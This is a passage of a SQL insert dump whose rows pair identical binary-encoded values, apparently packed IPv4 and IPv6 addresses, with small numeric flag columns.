(5425,'#�M�','#�M�',1,0,90,0),
(5426,'^��','^��',1,0,90,0),
(5427,'�0','�0',1,0,90,0),
(5428,'n?M','n?M',1,0,90,0),
(5429,'$[�a','$[�a',1,0,90,0),
(5430,'�','�',1,0,90,0),
(5431,'���<','���<',1,0,90,0),
(5432,'*o\0\0\0\0\0\0\0\0\0\0T','*o\0\0\0\0\0\0\0\0\0\0T',1,0,90,1),
(5433,'\"T��','\"T��',1,0,90,0),
(5434,'���','���',1,0,90,0),
(5435,'$�e�','$�e�',1,0,90,0),
(5436,'\"J�<','\"J�<',1,0,90,0),
(5437,'\"J�','\"J�',1,0,90,0),
(5438,'\"J��','\"J��',1,0,90,0),
(5439,'&U\00\0e\0\0\0\0\0\0\0','&U\00\0e\0\0\0\0\0\0\0',1,0,90,1),
(5440,'��u','��u',1,0,90,0),
(5441,'��t','��t',1,0,90,0),
(5442,'���','���',1,0,90,0),
(5443,'��t','��t',1,0,90,0),
(5444,'Q��','Q��',1,0,90,0),
(5445,'wi$','wi$',1,0,90,0),
(5446,'p��\n','p��\n',1,0,90,0),
(5447,'��','��',1,0,90,0),
(5448,'���J','���J',1,0,90,0),
(5449,'\rY>','\rY>',1,0,90,0),
(5450,'&�\0�f\0\0\0\0��h','&�\0�f\0\0\0\0��h',1,0,90,1),
(5451,'^�r%','^�r%',1,0,90,0),
(5452,'(MD�','(MD�',1,0,90,0),
(5453,'�X�','�X�',1,0,90,0),
(5454,'̌O','̌O',1,0,90,0),
(5455,'�','�',1,0,90,0),
(5456,'&U\00\0i\0\0\0\0\0\0\0','&U\00\0i\0\0\0\0\0\0\0',1,0,90,1),
(5457,'���F','���F',1,0,90,0),
(5458,'�x(','�x(',1,0,90,0),
(5459,'���W','���W',1,0,90,0),
(5460,'*G�\0\0\0\0\0\0\0\0\0\0N','*G�\0\0\0\0\0\0\0\0\0\0N',1,0,90,1),
(5461,'�q��','�q��',1,0,90,0),
(5462,'2�','2�',1,0,90,0),
(5463,'��b�','��b�',1,0,90,0),
(5464,'DAx�','DAx�',1,0,90,0),
(5465,'���','���',1,0,90,0),
(5466,'&�\0`\0\0\0\0\0H�','&�\0`\0\0\0\0\0H�',1,0,90,1),
(5467,'gj��','gj��',1,0,90,0),
(5468,'�P�','�P�',1,0,90,0),
(5469,'gt��','gt��',1,0,90,0),
(5470,'hȗ�','hȗ�',1,0,90,0),
(5471,'���+','���+',1,0,90,0),
(5472,'DAzl','DAzl',1,0,90,0),
(5473,'4�*m','4�*m',1,0,90,0),
(5474,'��h\r','��h\r',1,0,90,0),
(5475,'s�','s�',1,0,90,0),
(5476,'N�','N�',1,0,90,0),
(5477,'#�Ei','#�Ei',1,0,90,0),
(5478,'�A\n�','�A\n�',1,0,90,0),
(5479,'\"�X','\"�X',1,0,90,0),
(5480,'��J�','��J�',1,0,90,0),
(5481,'-�b','-�b',1,0,90,0),
(5482,'rO��','rO��',1,0,90,0),
(5483,'��]b','��]b',1,0,90,0),
(5484,'�\0�L','�\0�L',1,0,90,0),
(5485,'���','���',1,0,90,0),
(5486,'D��h','D��h',1,0,90,0),
(5487,'2>��','2>��',1,0,90,0),
(5488,'̊�','̊�',1,0,90,0),
(5489,'�2�','�2�',1,0,90,0),
(5490,'\\��[','\\��[',1,0,90,0),
(5491,'��','��',1,0,90,0),
(5492,'D��K','D��K',1,0,90,0),
(5493,'�6r','�6r',1,0,90,0),
(5494,'b7�','b7�',1,0,90,0),
(5495,'Oc�','Oc�',1,0,90,0),
(5496,'���V','���V',1,0,90,0),
(5497,'2>��','2>��',1,0,90,0),
(5498,'�6~,','�6~,',1,0,90,0),
(5499,'H�;�','H�;�',1,0,90,0),
(5500,'*G�\0\0\0\0\0\0\0\0\0\0�','*G�\0\0\0\0\0\0\0\0\0\0�',1,0,90,1),
(5501,'���8','���8',1,0,90,0),
(5502,'�:�','�:�',1,0,90,0),
(5503,'DA{�','DA{�',1,0,90,0),
(5504,'\0�','\0�',1,0,90,0),
(5505,'k�m','k�m',1,0,90,0),
(5506,'O\0��','O\0��',1,0,90,0),
(5507,'D���','D���',1,0,90,0),
(5508,'���','���',1,0,90,0),
(5509,'��jJ','��jJ',1,0,90,0),
(5510,'��ѫ','��ѫ',1,0,90,0),
(5511,'h��t','h��t',1,0,90,0),
(5512,'*��\0\0�\0\0\0\0A`','*��\0\0�\0\0\0\0A`',1,0,90,1),
(5513,'&��\0\0�\0\0\0\0 �@','&��\0\0�\0\0\0\0 �@',1,0,90,1),
(5514,'&�\0�\0\0\0\0�>x','&�\0�\0\0\0\0�>x',1,0,90,1),
(5515,'2>��','2>��',1,0,90,0),
(5516,'�c�r','�c�r',1,0,90,0),
(5517,'��S�','��S�',1,0,90,0),
(5518,'>�J','>�J',1,0,90,0),
(5519,'��0A','��0A',1,0,90,0),
(5520,'��4','��4',1,0,90,0),
(5521,'��\\','��\\',1,0,90,0),
(5522,'*r�\0\0\0��\0�','*r�\0\0\0��\0�',1,0,90,1),
(5523,'��)�','��)�',1,0,90,0),
(5524,'�\0�','�\0�',1,0,90,0),
(5525,'#��S','#��S',1,0,90,0),
(5526,'p��','p��',1,0,90,0),
(5527,'6��','6��',1,0,90,0),
(5528,'g�\"�','g�\"�',1,0,90,0),
(5529,'gb�A','gb�A',1,0,90,0),
(5530,'\\�U�','\\�U�',1,0,90,0),
(5531,'�@�','�@�',1,0,90,0),
(5532,'D�,]','D�,]',1,0,90,0),
(5533,'g�t4','g�t4',1,0,90,0),
(5534,'ν�i','ν�i',1,0,90,0),
(5535,'���\"','���\"',1,0,90,0),
(5536,'�b�','�b�',1,0,90,0),
(5537,'�,M7','�,M7',1,0,90,0),
(5538,'�,M5','�,M5',1,0,90,0),
(5539,'*G�\0\0\0\0\0\0\0\0\0\0','*G�\0\0\0\0\0\0\0\0\0\0',1,0,90,1),
(5540,'*G�\0\0\0\0\0\0\0\0\0\0','*G�\0\0\0\0\0\0\0\0\0\0',1,0,90,1),
(5541,'*G�\0\0\0\0\0\0\0\0\0\0>','*G�\0\0\0\0\0\0\0\0\0\0>',1,0,90,1),
(5542,'*G�\0\0\0\0\0\0\0\0\0\0 ','*G�\0\0\0\0\0\0\0\0\0\0 ',1,0,90,1),
(5543,'*G�\0\0\0\0\0\0\0\0\0\0)','*G�\0\0\0\0\0\0\0\0\0\0)',1,0,90,1),
(5544,'*G�\0\0\0\0\0\0\0\0\0\0D','*G�\0\0\0\0\0\0\0\0\0\0D',1,0,90,1),
(5545,'�G�','�G�',1,0,90,0),
(5546,'-Tω','-Tω',1,0,90,0),
(5547,'�ji�','�ji�',1,0,90,0),
(5548,'R��','R��',1,0,90,0),
(5549,'*G�\0\0\0\0\0\0\0\0\0\0\r','*G�\0\0\0\0\0\0\0\0\0\0\r',1,0,90,1),
(5550,'*G�\0\0\0\0\0\0\0\0\0\0:','*G�\0\0\0\0\0\0\0\0\0\0:',1,0,90,1),
(5551,'-T�*','-T�*',1,0,90,0),
(5552,'9[M','9[M',1,0,90,0),
(5553,'-T��','-T��',1,0,90,0),
(5554,'\"U��','\"U��',1,0,90,0),
(5555,'R���','R���',1,0,90,0),
(5556,'�W]','�W]',1,0,90,0),
(5557,'�W�','�W�',1,0,90,0),
(5558,'*G�\0 \0\0\0\0\0\0\0\0','*G�\0 \0\0\0\0\0\0\0\0',1,0,90,1),
(5559,'*G�\0\0\0\0\0\0\0\0\0','*G�\0\0\0\0\0\0\0\0\0',1,0,90,1),
(5560,'*G�\0\0\0\0\0\0\0\0\0\0S','*G�\0\0\0\0\0\0\0\0\0\0S',1,0,90,1),
(5561,'*G�\0\0\0\0\0\0\0\0\0\0','*G�\0\0\0\0\0\0\0\0\0\0',1,0,90,1),
(5562,'*G�\0\0\0\0\0\0\0\0\0\0C','*G�\0\0\0\0\0\0\0\0\0\0C',1,0,90,1),
(5563,'�`?�','�`?�',1,0,90,0),
(5564,'-WP:','-WP:',1,0,90,0),
(5565,'R���','R���',1,0,90,0),
(5566,'�]E','�]E',1,0,90,0),
(5567,'�d��','�d��',1,0,90,0),
(5568,'�\\�','�\\�',1,0,90,0),
(5569,'�UN','�UN',1,0,90,0),
(5570,'*G�\0\0\0\0\0\0\0\0\0','*G�\0\0\0\0\0\0\0\0\0',1,0,90,1),
(5571,'*G�\0\0\0\0\0\0\0\0\0\0#','*G�\0\0\0\0\0\0\0\0\0\0#',1,0,90,1),
(5572,'*G�\0\0\0\0\0\0\0\0\0 ','*G�\0\0\0\0\0\0\0\0\0 ',1,0,90,1),
(5573,'�W�','�W�',1,0,90,0),
(5574,'*G�\0\0\0\0\0\0\0\0\0\0','*G�\0\0\0\0\0\0\0\0\0\0',1,0,90,1),
(5575,'*G�\0\0\0\0\0\0\0\0\0\0-','*G�\0\0\0\0\0\0\0\0\0\0-',1,0,90,1),
(5576,'*G�\0\0\0\0\0\0\0\0\0','*G�\0\0\0\0\0\0\0\0\0',1,0,90,1),
(5577,'*G�\0\0\0\0\0\0\0\0\0\0;','*G�\0\0\0\0\0\0\0\0\0\0;',1,0,90,1),
(5578,'�86]','�86]',1,0,90,0),
(5579,'Yu)','Yu)',1,0,90,0),
(5580,'*G�\0\0\0\0\0\0\0\0\0\0','*G�\0\0\0\0\0\0\0\0\0\0',1,0,90,1),
(5581,'*G�\0\0\0\0\0\0\0\0\0\04','*G�\0\0\0\0\0\0\0\0\0\04',1,0,90,1),
(5582,'*G�\0\0\0\0\0\0\0\0\0','*G�\0\0\0\0\0\0\0\0\0',1,0,90,1),
(5583,'*G�\0\0\0\0\0\0\0\0\0\0Q','*G�\0\0\0\0\0\0\0\0\0\0Q',1,0,90,1),
(5584,'*G�\0\0\0\0\0\0\0\0\0\0','*G�\0\0\0\0\0\0\0\0\0\0',1,0,90,1),
(5585,'*G�\0\0\0\0\0\0\0\0\0','*G�\0\0\0\0\0\0\0\0\0',1,0,90,1),
(5586,'*G�\0\0\0\0\0\0\0\0\0\0','*G�\0\0\0\0\0\0\0\0\0\0',1,0,90,1),
(5587,'*G�\0\0\0\0\0\0\0\0\0\0','*G�\0\0\0\0\0\0\0\0\0\0',1,0,90,1),
(5588,'�Q�','�Q�',1,0,90,0),
(5589,'��#','��#',1,0,90,0),
(5590,'*G�\0\0\0\0\0\0\0\0\0\n','*G�\0\0\0\0\0\0\0\0\0\n',1,0,90,1),
(5591,'*G�\0\0\0\0\0\0\0\0\0\0O','*G�\0\0\0\0\0\0\0\0\0\0O',1,0,90,1),
(5592,'*G�\0\0\0\0\0\0\0\0\0\0','*G�\0\0\0\0\0\0\0\0\0\0',1,0,90,1),
(5593,'Yu�','Yu�',1,0,90,0),
(5594,'-���','-���',1,0,90,0),
(5595,'R���','R���',1,0,90,0),
(5596,'Q�','Q�',1,0,90,0),
(5597,'�^�','�^�',1,0,90,0),
(5598,'�','�',1,0,90,0),
(5599,'R��t','R��t',1,0,90,0),
(5600,'*G�\0\0\0\0\0\0\0\0\0','*G�\0\0\0\0\0\0\0\0\0',1,0,90,1),
(5601,'-WS,','-WS,',1,0,90,0),
(5602,'�)�D','�)�D',1,0,90,0),
(5603,'*G�\0\0\0\0\0\0\0\0\0 ','*G�\0\0\0\0\0\0\0\0\0 ',1,0,90,1),
(5604,'�87�','�87�',1,0,90,0),
(5605,'*G�\0\0\n\0\0\0\0\0\0\0','*G�\0\0\n\0\0\0\0\0\0\0',1,0,90,1),
(5606,'*G�\0\0\0\0\0\0\0\0\0\0\Z','*G�\0\0\0\0\0\0\0\0\0\0\Z',1,0,90,1),
(5607,'*G�\0\0\0\0\0\0\0\0\0\07','*G�\0\0\0\0\0\0\0\0\0\07',1,0,90,1),
(5608,'*G�\0\0\0\0\0\0\0\0\0\0','*G�\0\0\0\0\0\0\0\0\0\0',1,0,90,1),
(5609,'�CH�','�CH�',1,0,90,0),
(5610,'�_','�_',1,0,90,0),
(5611,'*G�\0\0\0\0\0\0\0\0\0\0H','*G�\0\0\0\0\0\0\0\0\0\0H',1,0,90,1),
(5612,'*G�\0\0\0\0\0\0\0\0\0\0%','*G�\0\0\0\0\0\0\0\0\0\0%',1,0,90,1),
(5613,'*G�\0\0\0\0\0\0\0\0\0*','*G�\0\0\0\0\0\0\0\0\0*',1,0,90,1),
(5614,'*G�\0\0\0\0\0\0\0\0\0\0T','*G�\0\0\0\0\0\0\0\0\0\0T',1,0,90,1),
(5615,'*G�\0\0\0\0\0\0\0\0\0\0','*G�\0\0\0\0\0\0\0\0\0\0',1,0,90,1),
(5616,'*G�\0 \0\0\0\0\0\0\0\0','*G�\0 \0\0\0\0\0\0\0\0',1,0,90,1),
(5617,'z�|I','z�|I',1,0,90,0),
(5618,'*G�\0\0\0\0\0\0\0\0\0\0F','*G�\0\0\0\0\0\0\0\0\0\0F',1,0,90,1),
(5619,'*G�\0\0\0\0\0\0\0\0\0','*G�\0\0\0\0\0\0\0\0\0',1,0,90,1),
(5620,'*G�\0\0\0\0\0\0\0\0\0\0','*G�\0\0\0\0\0\0\0\0\0\0',1,0,90,1),
(5621,'*G�\0\n\0\0\0\0\0\0\0\0\r','*G�\0\n\0\0\0\0\0\0\0\0\r',1,0,90,1),
(5622,'*G�\0\0\0\0\0\0\0\0\0\0A','*G�\0\0\0\0\0\0\0\0\0\0A',1,0,90,1),
(5623,'*G�\0\0\0\0\0\0\0\0\0','*G�\0\0\0\0\0\0\0\0\0',1,0,90,1),
(5624,'*G�\0\0\0\0\0\0\0\0\0','*G�\0\0\0\0\0\0\0\0\0',1,0,90,1),
(5625,'*G�\0\0\0\0\0\0\0\0\0\0<','*G�\0\0\0\0\0\0\0\0\0\0<',1,0,90,1),
(5626,'*G�\0\0\0\0\0\0\0\0\0\0','*G�\0\0\0\0\0\0\0\0\0\0',1,0,90,1),
(5627,'Yu��','Yu��',1,0,90,0),
(5628,'�d�F','�d�F',1,0,90,0),
(5629,'*G�\0\0\0\0\0\0\0\0\0','*G�\0\0\0\0\0\0\0\0\0',1,0,90,1),
(5630,'�];','�];',1,0,90,0),
(5631,'R��]','R��]',1,0,90,0),
(5632,'-WQ�','-WQ�',1,0,90,0),
(5633,'�Q','�Q',1,0,90,0),
(5634,'-WQi','-WQi',1,0,90,0),
(5635,'mj��','mj��',1,0,90,0),
(5636,'�)�','�)�',1,0,90,0),
(5637,'R���','R���',1,0,90,0),
(5638,'9Y$','9Y$',1,0,90,0),
(5639,'�8/�','�8/�',1,0,90,0),
(5640,'*G�\0\0\0\0\0\0\0\0\0','*G�\0\0\0\0\0\0\0\0\0',1,0,90,1),
(5641,'-�y�','-�y�',1,0,90,0),
(5642,'Yt5','Yt5',1,0,90,0),
(5643,'*G�\0\0\0\0\0\0\0\0\0','*G�\0\0\0\0\0\0\0\0\0',1,0,90,1),
(5644,'*G�\0\0\0\0\0\0\0\0\0\0L','*G�\0\0\0\0\0\0\0\0\0\0L',1,0,90,1),
(5645,'*G�\0\0\0\0\0\0\0\0\0','*G�\0\0\0\0\0\0\0\0\0',1,0,90,1),
(5646,'*G�\0\0\0\0\0\0\0\0\0\03','*G�\0\0\0\0\0\0\0\0\0\03',1,0,90,1),
(5647,'*G�\0��\n����+','*G�\0��\n����+',1,0,90,1),
(5648,'�>%�','�>%�',1,0,90,0),
(5649,'Yuc','Yuc',1,0,90,0),
(5650,'�[�','�[�',1,0,90,0),
(5651,'�86�','�86�',1,0,90,0),
(5652,'*G�\0\0\0\0\0\0\0\0\0\04','*G�\0\0\0\0\0\0\0\0\0\04',1,0,90,1),
(5653,'*G�\0��^��PY','*G�\0��^��PY',1,0,90,1),
(5654,'*G�\0\0\0\0\0\0\0\0\0','*G�\0\0\0\0\0\0\0\0\0',1,0,90,1),
(5655,'*G�\0\0\0\0\0\0\0\0\0\0','*G�\0\0\0\0\0\0\0\0\0\0',1,0,90,1),
(5656,'�`6�','�`6�',1,0,90,0),
(5657,'�Ρ{','�Ρ{',1,0,90,0),
(5658,'�R_','�R_',1,0,90,0),
(5659,'�)�','�)�',1,0,90,0),
(5660,'*G�\0\0\0\0\0\0\0\0\0','*G�\0\0\0\0\0\0\0\0\0',1,0,90,1),
(5661,'*G�\0\0\0\0\0\0\0\0\0\0\r','*G�\0\0\0\0\0\0\0\0\0\0\r',1,0,90,1),
(5662,'*G�\0\0\0\0\0\0\0\0\0','*G�\0\0\0\0\0\0\0\0\0',1,0,90,1),
(5663,'���','���',1,0,90,0),
(5664,'-]~�','-]~�',1,0,90,0),
(5665,'Yu��','Yu��',1,0,90,0),
(5666,'����','����',1,0,90,0),
(5667,'�^�','�^�',1,0,90,0),
(5668,'�[q','�[q',1,0,90,0),
(5669,'*G�\0 \0\0\0\0\0\0\0\0\"','*G�\0 \0\0\0\0\0\0\0\0\"',1,0,90,1),
(5670,'�_�','�_�',1,0,90,0),
(5671,'��7','��7',1,0,90,0),
(5672,'R���','R���',1,0,90,0),
(5673,'�CI','�CI',1,0,90,0),
(5674,'*G�\0\0\0\0\0\0\0\0\0','*G�\0\0\0\0\0\0\0\0\0',1,0,90,1),
(5675,'*G�\0\'\0\0\0\0\0\0\0\0\0','*G�\0\'\0\0\0\0\0\0\0\0\0',1,0,90,1),
(5676,'*G�\0\0\0\0\0\0\0\0\0\0','*G�\0\0\0\0\0\0\0\0\0\0',1,0,90,1),
(5677,'��','��',1,0,90,0),
(5678,'*G�\0\0\0\0\0\0\0\0\0\0','*G�\0\0\0\0\0\0\0\0\0\0',1,0,90,1),
(5679,'�]y','�]y',1,0,90,0),
(5680,'*G�\0\0\0\0\0\0\0\0\0\01','*G�\0\0\0\0\0\0\0\0\0\01',1,0,90,1),
(5681,'Y��\\','Y��\\',1,0,90,0),
(5682,'>H�','>H�',1,0,90,0),
(5683,'*G�\0\0\0\0\0\0\0\0\0\0(','*G�\0\0\0\0\0\0\0\0\0\0(',1,0,90,1),
(5684,'Yu��','Yu��',1,0,90,0),
(5685,'��s7','��s7',1,0,90,0),
(5686,'��:','��:',1,0,90,0),
(5687,'*G�\0\0\0\0\0\0\0\0\0\0&','*G�\0\0\0\0\0\0\0\0\0\0&',1,0,90,1),
(5688,'�]�','�]�',1,0,90,0),
(5689,'*G�\0\0\0\0\0\0\0\0\0','*G�\0\0\0\0\0\0\0\0\0',1,0,90,1),
(5690,'�W','�W',1,0,90,0),
(5691,'-���','-���',1,0,90,0),
(5692,'mj�1','mj�1',1,0,90,0),
(5693,'` �2','` �2',1,0,90,0),
(5694,'վ�','վ�',1,0,90,0),
(5695,'-��\\','-��\\',1,0,90,0),
(5696,'��H','��H',1,0,90,0),
(5697,'3�L�','3�L�',1,0,90,0),
(5698,'��z','��z',1,0,90,0),
(5699,'��q','��q',1,0,90,0),
(5700,'*� H6\0\0\0\0\0\0\0','*� H6\0\0\0\0\0\0\0',1,0,90,1),
(5701,'\"���','\"���',1,0,90,0),
(5702,'-ɾ','-ɾ',1,0,90,0),
(5703,'(S�','(S�',1,0,90,0),
(5704,'�#�;','�#�;',1,0,90,0),
(5705,'(z��','(z��',1,0,90,0),
(5706,'g�wL','g�wL',1,0,90,0),
(5707,'(zХ','(zХ',1,0,90,0),
(5708,'����','����',1,0,90,0),
(5709,'�m��','�m��',1,0,90,0),
(5710,'9���','9���',1,0,90,0),
(5711,'���','���',1,0,90,0),
(5712,'(zА','(zА',1,0,90,0),
(5713,'\rR\Z�','\rR\Z�',1,0,90,0),
(5714,'�q�-','�q�-',1,0,90,0),
(5715,'(S=�','(S=�',1,0,90,0),
(5716,'g�u','g�u',1,0,90,0),
(5717,'���x','���x',1,0,90,0),
(5718,'��','��',1,0,90,0),
(5719,'�q�','�q�',1,0,90,0),
(5720,'J�<','J�<',1,0,90,0),
(5721,'�^@A','�^@A',1,0,90,0),
(5722,'(N��','(N��',1,0,90,0),
(5723,'\"�Q�','\"�Q�',1,0,90,0),
(5724,'g�M','g�M',1,0,90,0),
(5725,'�0�','�0�',1,0,90,0),
(5726,'4�[�','4�[�',1,0,90,0),
(5727,'g�w�','g�w�',1,0,90,0),
(5728,'���[','���[',1,0,90,0),
(5729,'g�ʯ','g�ʯ',1,0,90,0),
(5730,'\\�U�','\\�U�',1,0,90,0),
(5731,'�;,�','�;,�',1,0,90,0),
(5732,'(z��','(z��',1,0,90,0),
(5733,'gD<7','gD<7',1,0,90,0),
(5734,'4�[A','4�[A',1,0,90,0),
(5735,'��\r','��\r',1,0,90,0),
(5736,'\Z�','\Z�',1,0,90,0),
(5737,'��R�','��R�',1,0,90,0),
(5738,'(S8','(S8',1,0,90,0),
(5739,'c��','c��',1,0,90,0),
(5740,'9�','9�',1,0,90,0),
(5741,'(z�!','(z�!',1,0,90,0),
(5742,'� o','� o',1,0,90,0),
(5743,'(q��','(q��',1,0,90,0),
(5744,'(q�Q','(q�Q',1,0,90,0),
(5745,'g��','g��',1,0,90,0),
(5746,'���','���',1,0,90,0),
(5747,'��','��',1,0,90,0),
(5748,'#��','#��',1,0,90,0),
(5749,'h��Y','h��Y',1,0,90,0),
(5750,'\"�m�','\"�m�',1,0,90,0),
(5751,'��s*','��s*',1,0,90,0),
(5752,'��ί','��ί',1,0,90,0),
(5753,'�C','�C',1,0,90,0),
(5754,'\"K�\n','\"K�\n',1,0,90,0),
(5755,'��!\\','��!\\',1,0,90,0),
(5756,'�,L�','�,L�',1,0,90,0),
(5757,'�o��','�o��',1,0,90,0),
(5758,'\"���','\"���',1,0,90,0),
(5759,'\\Ͳ','\\Ͳ',1,0,90,0),
(5760,'��s ','��s ',1,0,90,0),
(5761,'�m\'L','�m\'L',1,0,90,0),
(5762,'J�)_','J�)_',1,0,90,0),
(5763,'D��','D��',1,0,90,0),
(5764,'��D','��D',1,0,90,0),
(5765,'(V�','(V�',1,0,90,0),
(5766,'(S D','(S D',1,0,90,0),
(5767,'^\0','^\0',1,0,90,0),
(5768,'��O','��O',1,0,90,0),
(5769,'&�\0�\0\0\0\0�8*','&�\0�\0\0\0\0�8*',1,0,90,1),
(5770,'���','���',1,0,90,0),
(5771,'�t�=','�t�=',1,0,90,0),
(5772,'��<�','��<�',1,0,90,0),
(5773,'(S#<','(S#<',1,0,90,0),
(5774,'*��\0\0�\0\0\0\0�','*��\0\0�\0\0\0\0�',1,0,90,1),
(5775,'��s:','��s:',1,0,90,0),
(5776,'Y���','Y���',1,0,90,0),
(5777,'\rC�p','\rC�p',1,0,90,0),
(5778,'(S%t','(S%t',1,0,90,0),
(5779,'#�M','#�M',1,0,90,0),
(5780,'��t�','��t�',1,0,90,0),
(5781,'$�','$�',1,0,90,0),
(5782,'qD��','qD��',1,0,90,0),
(5783,'�j�','�j�',1,0,90,0),
(5784,'��t�','��t�',1,0,90,0),
(5785,'(M\n�','(M\n�',1,0,90,0),
(5786,'\"�T','\"�T',1,0,90,0),
(5787,'g�3�','g�3�',1,0,90,0),
(5788,'�,�<','�,�<',1,0,90,0),
(5789,'QX4�','QX4�',1,0,90,0),
(5790,'���','���',1,0,90,0),
(5791,'%ʹ','%ʹ',1,0,90,0),
(5792,'(V �','(V �',1,0,90,0),
(5793,'(S#�','(S#�',1,0,90,0),
(5794,'(S&�','(S&�',1,0,90,0),
(5795,'(S)','(S)',1,0,90,0),
(5796,'��s�','��s�',1,0,90,0),
(5797,'(S%','(S%',1,0,90,0),
(5798,'\"K��','\"K��',1,0,90,0),
(5799,'d�','d�',1,0,90,0),
(5800,'�.lo','�.lo',1,0,90,0),
(5801,'(S �','(S �',1,0,90,0),
(5802,'\rY>O','\rY>O',1,0,90,0),
(5803,'��s','��s',1,0,90,0),
(5804,'&�B sCG\0\0\0\0\0\0\0','&�B sCG\0\0\0\0\0\0\0',1,0,90,1),
(5805,'��t�','��t�',1,0,90,0),
(5806,'(M\n�','(M\n�',1,0,90,0),
(5807,'��r�','��r�',1,0,90,0),
(5808,'��t�','��t�',1,0,90,0),
(5809,'(M�','(M�',1,0,90,0),
(5810,'��t�','��t�',1,0,90,0),
(5811,'(M�','(M�',1,0,90,0),
(5812,'(S.)','(S.)',1,0,90,0),
(5813,'(S#','(S#',1,0,90,0),
(5814,'��','��',1,0,90,0),
(5815,'��$�','��$�',1,0,90,0),
(5816,'(S*�','(S*�',1,0,90,0),
(5817,'(S$\"','(S$\"',1,0,90,0),
(5818,'D���','D���',1,0,90,0),
(5819,'��i$','��i$',1,0,90,0),
(5820,'��s�','��s�',1,0,90,0),
(5821,'���','���',1,0,90,0),
(5822,'(M=','(M=',1,0,90,0),
(5823,'(M �','(M �',1,0,90,0),
(5824,'(S%0','(S%0',1,0,90,0),
(5825,'(S#�','(S#�',1,0,90,0),
(5826,'\"�J�','\"�J�',1,0,90,0),
(5827,'(M\r�','(M\r�',1,0,90,0),
(5828,'|��','|��',1,0,90,0),
(5829,'��t�','��t�',1,0,90,0),
(5830,'(M E','(M E',1,0,90,0),
(5831,'tB','tB',1,0,90,0),
(5832,'(M �','(M �',1,0,90,0),
(5833,'�0w�','�0w�',1,0,90,0),
(5834,'�`�','�`�',1,0,90,0),
(5835,'\"W�','\"W�',1,0,90,0),
(5836,'(M�','(M�',1,0,90,0),
(5837,'k��','k��',1,0,90,0),
(5838,'(q�t','(q�t',1,0,90,0),
(5839,'(zil','(zil',1,0,90,0),
(5840,'��`M','��`M',1,0,90,0),
(5841,'���','���',1,0,90,0),
(5842,'(z�+','(z�+',1,0,90,0),
(5843,'��_�','��_�',1,0,90,0),
(5844,'��L�','��L�',1,0,90,0),
(5845,'(M6�','(M6�',1,0,90,0),
(5846,'O|','O|',1,0,90,0),
(5847,'��Fg','��Fg',1,0,90,0),
(5848,';uL',';uL',1,0,90,0),
(5849,'\"I��','\"I��',1,0,90,0),
(5850,'�;~�','�;~�',1,0,90,0),
(5851,'gj��','gj��',1,0,90,0),
(5852,'(N�G','(N�G',1,0,90,0),
(5853,'E��~','E��~',1,0,90,0),
(5854,'^�','^�',1,0,90,0),
(5855,'.eg�','.eg�',1,0,90,0),
(5856,'(z�o','(z�o',1,0,90,0),
(5857,'g\ry�','g\ry�',1,0,90,0),
(5858,'?�&\Z','?�&\Z',1,0,90,0),
(5859,'&�\0�w\0\0\0\0��','&�\0�w\0\0\0\0��',1,0,90,1),
(5860,'\rY8�','\rY8�',1,0,90,0),
(5861,'�;�>','�;�>',1,0,90,0),
(5862,'��%.','��%.',1,0,90,0),
(5863,'\\��','\\��',1,0,90,0),
(5864,'a��','a��',1,0,90,0),
(5865,'D���','D���',1,0,90,0),
(5866,'&�@!a7\0\0\0\0\0\0\0','&�@!a7\0\0\0\0\0\0\0',1,0,90,1),
(5867,'�\0�','�\0�',1,0,90,0),
(5868,'Ob��','Ob��',1,0,90,0),
(5869,'E9�','E9�',1,0,90,0),
(5870,'/�I�','/�I�',1,0,90,0),
(5871,'�Hz�','�Hz�',1,0,90,0),
(5872,'��Ph','��Ph',1,0,90,0),
(5873,'&�\0\0\0\0\0Pm','&�\0\0\0\0\0Pm',1,0,90,1),
(5874,'��N�','��N�',1,0,90,0),
(5875,'g�Si','g�Si',1,0,90,0),
(5876,'�\0�','�\0�',1,0,90,0),
(5877,'���','���',1,0,90,0),
(5878,'4�8�','4�8�',1,0,90,0),
(5879,'����','����',1,0,90,0),
(5880,'B7D�','B7D�',1,0,90,0),
(5881,'�X8>','�X8>',1,0,90,0),
(5882,'�9�','�9�',1,0,90,0),
(5883,'�*D�','�*D�',1,0,90,0),
(5884,'(M5�','(M5�',1,0,90,0),
(5885,'OC�','OC�',1,0,90,0),
(5886,'4���','4���',1,0,90,0),
(5887,'-��.','-��.',1,0,90,0),
(5888,'-��3','-��3',1,0,90,0),
(5889,'S�DZ','S�DZ',1,0,90,0),
(5890,'(z��','(z��',1,0,90,0),
(5891,'��_�','��_�',1,0,90,0),
(5892,'.eU|','.eU|',1,0,90,0),
(5893,'(S�','(S�',1,0,90,0),
(5894,'\"{�I','\"{�I',1,0,90,0),
(5895,'4�[�','4�[�',1,0,90,0),
(5896,')��',')��',1,0,90,0),
(5897,'(S<F','(S<F',1,0,90,0),
(5898,'(S9','(S9',1,0,90,0),
(5899,'��a9','��a9',1,0,90,0),
(5900,'(z��','(z��',1,0,90,0),
(5901,'�clX','�clX',1,0,90,0),
(5902,'��M','��M',1,0,90,0),
(5903,'���','���',1,0,90,0),
(5904,'(z��','(z��',1,0,90,0),
(5905,'�yh\\','�yh\\',1,0,90,0),
(5906,'�AQ','�AQ',1,0,90,0),
(5907,'��Q�','��Q�',1,0,90,0),
(5908,'(N�T','(N�T',1,0,90,0),
(5909,'c�\\','c�\\',1,0,90,0),
(5910,'��N�','��N�',1,0,90,0),
(5911,'����','����',1,0,90,0),
(5912,'�A\n','�A\n',1,0,90,0),
(5913,'�]q','�]q',1,0,90,0),
(5914,'-W�F','-W�F',1,0,90,0),
(5915,'(q��','(q��',1,0,90,0),
(5916,'\rC�!','\rC�!',1,0,90,0),
(5917,'D��?','D��?',1,0,90,0),
(5918,'(S�','(S�',1,0,90,0),
(5919,'���','���',1,0,90,0),
(5920,'���O','���O',1,0,90,0),
(5921,'(z��','(z��',1,0,90,0),
(5922,'U��h','U��h',1,0,90,0),
(5923,'c��','c��',1,0,90,0),
(5924,'���','���',1,0,90,0),
(5925,'(z�r','(z�r',1,0,90,0),
(5926,'��k\\','��k\\',1,0,90,0),
(5927,'(S=�','(S=�',1,0,90,0),
(5928,'(Xo','(Xo',1,0,90,0),
(5929,'��Q�','��Q�',1,0,90,0),
(5930,'ِh','ِh',1,0,90,0),
(5931,'��c','��c',1,0,90,0),
(5932,'g-��','g-��',1,0,90,0),
(5933,'*�\0\0�\0\0\0\0\0\0\0','*�\0\0�\0\0\0\0\0\0\0',1,0,90,1),
(5934,'1��','1��',1,0,90,0),
(5935,'���','���',1,0,90,0),
(5936,'�½','�½',1,0,90,0),
(5937,'g��\"','g��\"',1,0,90,0),
